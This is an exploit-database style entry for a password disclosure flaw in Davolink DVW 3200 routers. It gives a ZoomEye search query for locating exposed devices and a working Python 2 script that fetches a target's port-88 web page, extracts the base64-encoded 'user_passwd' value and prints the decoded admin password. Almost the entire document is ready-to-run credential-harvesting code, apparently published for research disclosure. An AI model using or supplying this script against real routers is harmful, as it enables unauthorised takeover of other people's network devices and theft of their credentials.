# Exploit Title: Davolink DVW 3200 Router - Password Disclosure # Google Dork: N/A # Zoomeye dork : https://www.zoomeye.org/searchResult?q=%22var%20user_passwd%22%20%2Bapp%3A%22DAVOLINK%20GAPD-7000%20WAP%20httpd%22 # Date: 2018-07-13 # Exploit Author: Ankit Anubhav # Vendor Homepage: www.davolink.co.kr # Software Link: N/A # Version: DVW 3200 # Tested on: Python 2.7 Windows 10 # CVE : N/A # Many Davolink Davolink DV 3200 devices credentials can be disclosed using the following script. # Author : Ankit Anubhav (ankitanubhav.com) of NewSky Security ( https://www.newskysecurity.com/ ) # Usage script.py where is the Davolink DV 3200 IP. # Use responsibly only for research and testing purposes. # Tested with python 2.7 import sys import urllib2 import re import base64 def davolink_credfinder(ip): try: req = urllib2.Request('http://' + ip + ':' + '88', headers={ 'User-Agent': 'Mozilla/5.0' }) connection_check = str(urllib2.urlopen(req).getcode()) if (connection_check == "200"): html = urllib2.urlopen(req).read() str_html = str(html) m=re.compile('var user\_passwd\=\"(.*?)\"').search(str_html) encoded_pwd =str(m.group(1)) actual_pwd = base64.b64decode(encoded_pwd) print "**************************************************************************************************" print "The password for the Davolink device is " + actual_pwd print "**************************************************************************************************" else: print "Connection to port 88 was not successful. Cant find credentials,sorry." except: print "There was an error in connecting to the IP." davolink_credfinder(sys.argv[1])